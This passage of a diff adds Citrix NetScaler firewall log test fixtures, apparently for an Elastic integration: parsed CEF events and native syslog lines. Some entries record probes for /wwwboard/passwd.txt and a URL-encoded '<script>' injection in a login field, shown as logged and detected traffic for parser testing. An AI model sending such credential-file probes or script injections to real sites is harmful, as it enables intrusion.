cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=transformed", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "facility": "local0", + "name": "APPFW_SAFECOMMERCE", + "ppe_id": "PPE1", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "Ycby5IvjL6FoVa6Ah94QFTIUpC80001", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "transformed", + "id": "1470", + "original": "Jun 13 00:25:31 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=34041 method=GET request=http://aaron.stratum8.net/FFC/CreditCardMind.html msg=Maximum number of potential credit card numbers seen cn1=1470 cn2=708 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=transformed", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "708", + "method": "GET" + } + }, + "message": "Maximum number of potential credit card numbers seen", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 34041 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "html", + "original": "http://aaron.stratum8.net/FFC/CreditCardMind.html", + "path": "/FFC/CreditCardMind.html", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-13T01:11:09.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=61141 method=GET request=http://aaron.stratum8.net/FFC/wwwboard/passwd.txt msg=Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=140 cn2=841 cs1=pr_ffc cs2=PPE0 cs3=OyTgjbXBqcpBFeENKDlde3OkMQ00001 cs4=ALERT cs5=2015 cs6=web-cgi act=blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "facility": "local0", + "name": "APPFW_SIGNATURE_MATCH", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "OyTgjbXBqcpBFeENKDlde3OkMQ00001", + "severity": "ALERT", + "signature_violation_category": "web-cgi" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "blocked", + "id": "140", + "original": "Jun 13 01:11:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=61141 method=GET request=http://aaron.stratum8.net/FFC/wwwboard/passwd.txt msg=Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=140 cn2=841 cs1=pr_ffc cs2=PPE0 cs3=OyTgjbXBqcpBFeENKDlde3OkMQ00001 cs4=ALERT cs5=2015 cs6=web-cgi act=blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "841", + "method": "GET" + } + }, + "message": "Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access ", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 61141 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "txt", + "original": "http://aaron.stratum8.net/FFC/wwwboard/passwd.txt", + "path": "/FFC/wwwboard/passwd.txt", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-08T00:21:09.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=NorthAmerica.US.Arizona.Tucson.*.* spt=18655 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=77 cn2=1547 cs1=test_pr_adv cs2=PPE1 cs3=KDynjg1pbFtfhC/nt0rBU1o/Tyg0001 cs4=ALERT cs5=2015 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "extended": { + "geolocation": "NorthAmerica.US.Arizona.Tucson.*.*" + }, + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE1", + "priority": "info", + "profile_name": "test_pr_adv", + "session_id": "KDynjg1pbFtfhC/nt0rBU1o/Tyg0001", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "77", + "original": "June 8 00:21:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=NorthAmerica.US.Arizona.Tucson.*.* spt=18655 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=77 cn2=1547 cs1=test_pr_adv cs2=PPE1 cs3=KDynjg1pbFtfhC/nt0rBU1o/Tyg0001 cs4=ALERT cs5=2015 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "1547", + "method": "GET" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 18655 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "html", + "original": "http://aaron.stratum8.net/FFC/login.html", + "path": "/FFC/login.html", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-09T23:50:53.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=Unknown spt=5086 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=74 cn2=1576 cs1=test_pr_adv cs2=PPE2 cs3=PyR0eOEM4gf6GJiTyauiHByL88E0002 cs4=ALERT cs5=2015 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "extended": { + "geolocation": "Unknown" + }, + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE2", + "priority": "info", + "profile_name": "test_pr_adv", + "session_id": "PyR0eOEM4gf6GJiTyauiHByL88E0002", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "74", + "original": "June 9 23:50:53 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=Unknown spt=5086 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=74 cn2=1576 cs1=test_pr_adv cs2=PPE2 cs3=PyR0eOEM4gf6GJiTyauiHByL88E0002 cs4=ALERT cs5=2015 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "1576", + "method": "GET" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 5086 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "html", + "original": "http://aaron.stratum8.net/FFC/login.html", + "path": "/FFC/login.html", + "scheme": "http" + } + }, + { + "@timestamp": "2012-12-19T00:38:09.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE_XFORM|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Transformed (xout) potential credit card numbers seen in server response cn1=652 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_SAFECOMMERCE_XFORM", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "li8MdGfW49uG8tGdSV85ech41a0A000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "transformed", + "id": "652", + "original": "Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE_XFORM|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Transformed (xout) potential credit card numbers seen in server response cn1=652 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "610", + "method": "GET" + } + }, + "message": " Transformed (xout) potential credit card numbers seen in server response", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 56116 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/CreditCardMind.html", + "path": "/FFC/CreditCardMind.html", + "scheme": "http" + } + }, + { + "@timestamp": "2012-12-19T00:38:09.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Maximum no. of potential credit card numbers seen cn1=653 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_SAFECOMMERCE", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "li8MdGfW49uG8tGdSV85ech41a0A000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "transformed", + "id": "653", + "original": "Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Maximum no. of potential credit card numbers seen cn1=653 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "610", + "method": "GET" + } + }, + "message": " Maximum no. of potential credit card numbers seen", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 56116 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/CreditCardMind.html", + "path": "/FFC/CreditCardMind.html", + "scheme": "http" + } + }, + { + "@timestamp": "2012-12-18T21:46:17.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "profile1", + "session_id": "IliG4Dxp1SjOhKVRDVBXmqvAaIcA000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "465", + "original": "Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "535", + "method": "GET" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 54711 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/login_post.html?abc\\=def", + "path": "/FFC/login_post.html", + "query": "abc\\=def", + "scheme": "http" + } + }, + { + "@timestamp": "2012-12-19T01:07:56.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=56687 method=GET request=http://vpx247.example.net/FFC/wwwboard/passwd.txt msg= Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=224 cn2=205 cs1=pr_ffc cs2=PPE0 cs3=POousP7CIMW5nwZ5Rs4nq5DND0sA000 cs4=ALERT cs5=2012 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_SIGNATURE_MATCH", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "POousP7CIMW5nwZ5Rs4nq5DND0sA000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "224", + "original": "Dec 19 01:07:56 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=56687 method=GET request=http://vpx247.example.net/FFC/wwwboard/passwd.txt msg= Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=224 cn2=205 cs1=pr_ffc cs2=PPE0 cs3=POousP7CIMW5nwZ5Rs4nq5DND0sA000 cs4=ALERT cs5=2012 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "205", + "method": "GET" + } + }, + "message": " Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 56687 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "txt", + "original": "http://vpx247.example.net/FFC/wwwboard/passwd.txt", + "path": "/FFC/wwwboard/passwd.txt", + "scheme": "http" + } + } + ] +} \ No newline at end of file diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log new file mode 100644 index 00000000000..652093ff421 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log @@ -0,0 +1,107 @@ +Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : default APPFW APPFW_cross-site scripting 60 0 : 175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area="Bad tag: script" +Jun 22 19:14:37 81.2.69.144 12/04/2017:17:21:00 GMT citrix.netscaler.test 0-PPE-1 : SSLLOG SSL_HANDSHAKE_SUCCESS 5743593 0 : SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite "RC4-MD5 TLSv1.2 Non-Export 128-bit" - Session Reuse +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352 +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2022/06/14:16:05:04 GMT - Total_bytes_send 102400 - Total_bytes_recv 204800 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - Start Time 2023-04-01T11:00:00Z - End Time 2023-04-01T11:05:00Z - Total_bytes_send 51200 - Total_bytes_recv 102400 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Vserver 1.128.0.0:443 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:80 - Delink Time 2023-04-01T12:00:00Z GMT Total_bytes_send 51200 - Total_bytes_recv 102400 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_CONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Client Reset +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP NAT_OTHERCONN_DELINK 4471 0 : Source 192.168.1.100:12345 - Destination 1.128.0.0:80 - NatIP 1.128.0.0:1024 - Destination 1.128.0.0:8080 - Start Time 2023-04-01T11:00:00Z - Delink Time 2023-04-01T11:05:00Z GMT - Total_bytes_send 102400 - Total_bytes_recv 153600 - Closure Reason Timeout +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 8 - Code 0 - Time Stamp 1617123456789(ms) - Hitcount 5 - Hit Rule Allow ICMP - Action ALLOW - Data +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ACL ACL6_PKT_LOG 4471 0 : Source 192.168.1.100 --> Destination 1.128.0.0 - Protocol ICMP - Type 3 - Code 1 - Time Stamp 1617123467890(ms) - Hitcount 3 - Hit Rule Block ICMP - Action DENY - Data +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_QUERY 4471 0 : Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_RESPONSE 4471 0 : Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_ERROR 4471 0 : Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_SIP_INFO_PACKET_EVENT 4471 0 : Infomsg: "SIP request received" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org - +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_RTSP_INFO_DELETE_CALL_PACKET_EVENT 4471 0 : Infomsg: "Log info RTSP ALG call deletion" - Group: RTSPALG - Session_ID: session123 - +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : URLFILT URLFILT_LOG 4471 0 : Source 192.168.1.100 - Destination 1.128.0.0 URL www.example.com/page - Category Technology - Categorygroup Internet - Reputation 3 - Policyaction ALLOW +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI ICAP_LOG 4471 0 : Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI INLINE_INSPECTION_LOG 4471 0 : ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI TRAFFIC_MIRROR_LOG 4471 0 : ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344 +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - Remote_ip 192.168.1.105 - Command "scp file.txt" - Status "Success" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGIN 4471 0 : User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type "Chrome" - SSLVPN_client_type NetScalerPlugin - Group(s) "IT,RemoteWorkers" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGOUT 4471 0 : User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time "2023-04-01T08:00:00Z" - End_time "2023-04-01T12:00:00Z" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod "Timeout" - Group(s) "HR,Finance" +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICASTART 4471 0 : Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime "2023-04-01T09:00:00Z" - connectionId 9a8b7c +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 